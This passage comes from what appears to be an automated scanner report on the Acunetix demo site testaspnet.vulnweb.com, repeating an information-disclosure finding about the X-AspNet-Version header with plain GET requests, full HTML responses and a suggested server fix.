          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        5. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" />
          </div>
          			
